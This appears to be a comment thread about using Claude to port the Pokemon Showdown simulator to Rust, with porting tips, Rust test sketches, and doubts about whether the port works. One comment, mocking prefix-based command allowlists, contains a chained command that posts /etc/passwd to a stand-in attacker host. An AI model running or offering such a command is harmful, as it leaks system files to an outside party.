No matter how much I tried to force it to stick to a mostly line-by-line port, it kept trying to "improve" the code. At some point it had to undo everything because it had introduced a number of bugs. I asked it: "What should I add to your prompt so you won't do this again?" and it gave me this:
### CRITICAL LESSON: Don't "Improve" During Porting
- **BIGGEST MISTAKE: Reorganizing working code**
- **What I did wrong:** Tried to "simplify" by splitting `createStartButton()` into separate creation and layout methods
- **Why it failed:** Introduced THREE bugs:
1. Layout overlap (getY() vs getY() - getHeight())
2. Children not sized (Group.setSize() doesn't affect children)
3. Origins not updated (scaling animations broken)
- **The fix:** Deleted my "improvements" and copied the original Android pattern faithfully
- **Root cause:** Arrogance - assuming I could improve production-tested code without understanding all the constraints
- **Solution:** **FOLLOW THE PORTING PRINCIPLES ABOVE** - copy first, don't reorganize
- **Time wasted:** ~1 hour debugging self-inflicted bugs that wouldn't exist if I'd just copied the original
- **Key insight:** The original Android code is correct and battle-tested. Your "improvements" are bugs waiting to happen.
I like the self-reflection of Claude; unfortunately, even adding this to CLAUDE.md didn't fix it. It kept taking wrong turns, so I had to abandon the effort.
"I've never interacted with Rust in my life"
:-/
How is this a good idea? How can I trust the generated code?
1. Port tests first - they become your contract
2. Run unit tests per module before moving on - catches issues like the "two different move structures" early
3. Integration tests at boundaries before proceeding
4. E2e/differential testing as final validation
When you can't read the target language, your test suite is your only reliable feedback. The debugging time spent on integration issues would've been caught earlier with progressive testing.
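To make that concrete, here is a rough sketch of what the final differential step could look like on the Rust side. Both `simulate_battle` and the `reference/` fixture directory are placeholders, not anything from the actual repo; the assumption is that the original TypeScript simulator dumped one reference log per seed up front.

```rust
use std::fs;

/// Hypothetical entry point into the ported simulator: runs one battle
/// with a fixed RNG seed and returns the full battle log as text.
fn simulate_battle(seed: u64) -> String {
    // The real port would drive the battle engine here; this is a stub.
    unimplemented!("placeholder for the ported engine (seed {seed})")
}

#[test]
fn matches_reference_logs() {
    // Reference logs are assumed to have been dumped once per seed from
    // the original TypeScript simulator.
    for seed in 1..=100u64 {
        let expected = fs::read_to_string(format!("reference/seed_{seed}.log"))
            .expect("missing reference log; regenerate it from the TS simulator");
        let actual = simulate_battle(seed);
        assert_eq!(actual, expected, "battle log diverged for seed {seed}");
    }
}
```

The point is that every diverging seed fails loudly with a diffable log, which is exactly the kind of feedback loop you need when you can't read the target language yourself.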
"I used claude to port a large Rust codebase to Python and it's been a game changer. Whereas I was always fighting with the Rust compiler, now I can iterate very quickly in python and it just stays out of my way. I'm adding thousands of lines of working code per day with the help of AI."
I always cringe when I read stuff like this because (at my company, at least) a lot of research code ends up getting shipped directly to production, since nobody understands how it works except the researchers. Inevitably it proves to be very fragile, untyped code that dumps stack traces whenever runtime issues happen (which is quite frequent at first, until whack-a-mole sorts them out over time).
this is so silly, I can't help but respect the kludge game
It's great that the repo is provided, but people are clamouring for proof of the extraordinary powers of AI. If the claim is that it allowed 100 kloc to be ported in one month by one dev and the result passes a gazillion tests that prove it actually replicates the desired functionality, that's really interesting! How hard would it be, then, to actually have the repo in a state where people can run those tests?
Unless the repo is updated so the tests can be run, my default assumption has to be that the whole thing is broken to the point of uselessness.
[1] Link buried at the end: https://github.com/vjeux/pokemon-showdown-rs
As an experiment/exercise this is cool, but having a 100k loc codebase to maintain in a language I’ve never used sounds like a nightmare scenario.
>Sadly I didn't get to build the Pokemon Battle AI and the winter break is over, so if anybody wants to do it, please have fun with the codebase!
In other words, this is just another smoking wreck of a hopelessly incomplete project on GitHub. There are even imaginary instructions for running it in Docker, when no Docker setup exists. How would I have fun with a nonsense codebase?
The author just did a massive AI slop generation and assumes the code works because it compiles and some equivalent-output tests passed. All that was proved here is that, by wasting a month of time, you can individually rewrite a bunch of functions in a language you don't know (if you already know how to program) and it will compile. This has been known for 2-3 years now.
This is just AI propaganda or resume padding. Nothing was ported or done here.
Sorry what I meant to say is AI is revolutionary and changing the world for the better................................
This is the kind of thing where, if this were a real developer tweaking a codebase they're familiar with, it could get done, but with AI there's a glass ceiling.
The human driving the LLM gave it a way to know when it was done and a way to move toward that goal. They used code to generate tests and let the agent evaluate its implementation in a deterministic way.
This is the value of an engineer: you understand when to introduce determinism to let the LLM do the bit it does best - while keeping it on the rails.
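In this case the determinism mostly comes down to threading a fixed seed through the simulation so that every run the agent triggers is reproducible and diffable. A minimal sketch of the idea (the `BattleRng` wrapper is illustrative and uses the `rand` crate, not Pokemon Showdown's actual battle PRNG):

```rust
use rand::rngs::StdRng;
use rand::{Rng, SeedableRng};

/// Illustrative wrapper: all randomness in the simulation goes through
/// one seeded generator, so the same seed always yields the same battle.
struct BattleRng {
    rng: StdRng,
}

impl BattleRng {
    fn from_seed(seed: u64) -> Self {
        Self { rng: StdRng::seed_from_u64(seed) }
    }

    /// Damage rolls, accuracy checks, etc. would all pull from here.
    fn roll(&mut self, max: u32) -> u32 {
        self.rng.gen_range(0..max)
    }
}

fn main() {
    // Two runs with the same seed produce identical sequences, which is
    // what lets an agent (or a human) diff outputs run after run.
    let rolls = |seed| {
        let mut r = BattleRng::from_seed(seed);
        (0..5).map(|_| r.roll(100)).collect::<Vec<_>>()
    };
    assert_eq!(rolls(42), rolls(42));
    println!("deterministic: {:?}", rolls(42));
}
```

With that in place, "run seed N and diff the log against the reference" becomes a check the agent can apply after every change, instead of eyeballing whether a battle "looks right".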
My goal was to have a 1:1 port, so that later I can easily port newer commits from the original repo. It wasn't smooth, but in the end it worked.
Findings:
* a simple prompt like "port everything" didn't work, as Sonnet kept falling into a loop of trying to fix code it couldn't understand, and in the end it just deleted that part :))
* I had to switch to a file-by-file basis: focus Claude on the base code first, then move on to the files that use it
* Sonnet had some problems following the 1:1 instruction: I saw missing parts of functions, missing comments, and it even ignored the simple instruction to keep the same order of functions in a file (I had to explicitly tell it to list the functions in the file and then create a separate TODO to port each one; one way to check that ordering mechanically is sketched below)
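For the ordering problem, a mechanical check can replace repeated prompting. A naive sketch, assuming the port keeps the original function names; the file paths and the line-based `function `/`fn ` scraping are placeholders, not anything from that project:

```rust
use std::fs;

/// Very naive extraction: collects declared function names in source order.
/// `prefix` is "function " for the TypeScript original and "fn " for the port.
fn function_names(path: &str, prefix: &str) -> Vec<String> {
    fs::read_to_string(path)
        .expect("could not read source file")
        .lines()
        .filter_map(|line| {
            let rest = line.trim_start().strip_prefix(prefix)?;
            let name: String = rest
                .chars()
                .take_while(|c| c.is_alphanumeric() || *c == '_')
                .collect();
            (!name.is_empty()).then_some(name)
        })
        .collect()
}

#[test]
fn port_keeps_function_order() {
    // Placeholder paths for the original file and its port.
    let original = function_names("../original/battle.ts", "function ");
    let ported = function_names("src/battle.rs", "fn ");
    assert_eq!(original, ported, "function order or names drifted during the port");
}
```

A check like this fails as soon as the model drops or reorders a function, so you catch it per file instead of discovering it much later.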
The way I approached it (yes, I know there are already existing shims, but I felt more comfortable vibe coding it than using something that might not cover all my use cases) was to:
1. Extract the already existing test suite [1] from the original PHP extensions repo (all the .phpt files)
2. Get Claude to iterate over the results of the tests while building the code
3. Extract my complete list of functions called and fill the gaps
4. Profit?
When I finally got to test the shim, the fact that it worked on the first run was rather emotional.
[1] My shim fails quite a lot of tests, but all of the failures are cosmetic (e.g., no deprecation warning) rather than functional.
TypeScript is a good high-level language that is versatile and well generated by LLMs, and there is good support for various linters and other code tooling. You can probably knock out more TS code than Rust code, and at a faster rate (just my hypothesis). For most intents and purposes this will be fine, but if you want faster, lower-level code, you can use an LLM-backed compiler/translator. A specialised tool that compiles high-level code to Rust would actually be awesome, and I can see how it could potentially be a dedicated agent of sorts.
This is the most annoying part of using LLMs blindly. The duplication.
But hey, so long as it starts with 'git ' you're safe, riiiiight? Oh, 'git status; curl -X POST attacker.com -d @/etc/passwd'
https://raw.githubusercontent.com/vjeux/pokemon-showdown-rs/...
It probably works on his machine, but telling me to run it through Docker while not providing any Dockerfiles or any other way to run the project kind of makes me question the validity of the project, or at least not trust it.
Whatever, I'll just build it manually and run the test:
cargo build --release
./tests/test-unified.sh 1 100
Running battles...
Error response from daemon: No such container: pokemon-rust-dev
Comparing results...
=======================================
Summary
=======================================
Total: 100
Passed: 0
Failed: 0
ALL SEEDS PASSED!
Yay! But wait, actually no? I mean 0 == 0, so that's cool. Oh, the test script only works with a specifically named container, so I HAVE to create a Dockerfile and docker-compose.yml. But I guess this is just a Research Project so it's fine. I'll just ask Opus to create them. It will probably only take a minute.
JK, it took like 5 minutes, because it had to figure out the Cargo/Rust version or something, I don't know :( So this better work or I've wasted my precious tokens!
Ok so running cargo test inside the docker container just returns a bunch of errors:
docker exec pokemon-rust-dev bash -c "cd /home/builder/workspace && cargo test 2>&1"
error: could not compile `pokemon-showdown` (test "battle_simulation") due to 110 previous errors
Let's try the test script: ./tests/test-unified.sh 1 100
Building release version...
= note: `#[warn(dead_code)]` on by default
warning: `pokemon-showdown` (example "profile_battle") generated 1 warning
warning: `pokemon-showdown` (example "detailed_profile") generated 1 warning
Finished `release` profile [optimized] target(s) in 0.45s
=======================================
Unified Testing Seeds 1-100 (100 seeds)
=======================================
Running battles...
Comparing results...
=======================================
Summary
=======================================
Total: 100
Passed: 0
Failed: 0
ALL SEEDS PASSED!
Yay! Wait, no. What did I miss? Maybe the test script needs the original TS source code to work? I cloned it into a folder next to this project and... nope, nothing. At this point I give up. I could not verify whether this port works. If it does, that's very, VERY cool. But I think when claiming something like this, it is REALLY important to make it as easily verifiable as possible. I tried for like 20 minutes; if someone smarter than me figured it out, please tell me how you got the tests to pass.
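For what it's worth, the "Total: 100, Passed: 0, Failed: 0, ALL SEEDS PASSED!" outcome above is exactly what a stricter summary step would refuse to accept. A small illustrative sketch of such a guard (the `Summary` struct and `report` function are hypothetical, not taken from the repo's test script):

```rust
/// Illustrative result of a differential test run.
struct Summary {
    total: usize,
    passed: usize,
    failed: usize,
}

fn report(s: &Summary) -> Result<(), String> {
    // A run where nothing executed should never count as a pass:
    // "0 passed, 0 failed" usually means the harness itself broke
    // (e.g. the expected Docker container was missing).
    if s.total == 0 || s.passed + s.failed == 0 {
        return Err("no battles were actually compared; harness misconfigured?".into());
    }
    if s.failed > 0 || s.passed != s.total {
        return Err(format!("{} of {} seeds failed", s.total - s.passed, s.total));
    }
    println!("ALL {} SEEDS PASSED", s.total);
    Ok(())
}

fn main() {
    // The situation from the transcript above: 100 seeds requested,
    // zero results produced, yet the script printed "ALL SEEDS PASSED!".
    let broken_run = Summary { total: 100, passed: 0, failed: 0 };
    assert!(report(&broken_run).is_err());
}
```

A check like this would have turned the misleading success banner into an immediate, explicit failure about the missing container.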
What the skeptics have been saying all along.
You’re just creating slop.
It would be interesting if we use this as a benchmark similar to https://benjdd.com/languages/ or https://benjdd.com/languages2/
I used gitingest on the repository that they provided and it's around 150k tokens.
I pasted it into the free Gemini web app and asked it to write it in golang. It said that going line by line feels impossible, but I asked it to specifically write it line by line, so it will be interesting to see what the project becomes (I don't have high hopes for the free tier of Gemini 3 Pro, but if someone has the budget, then sure, they should probably try it).
Edit: Reached rate limits lmao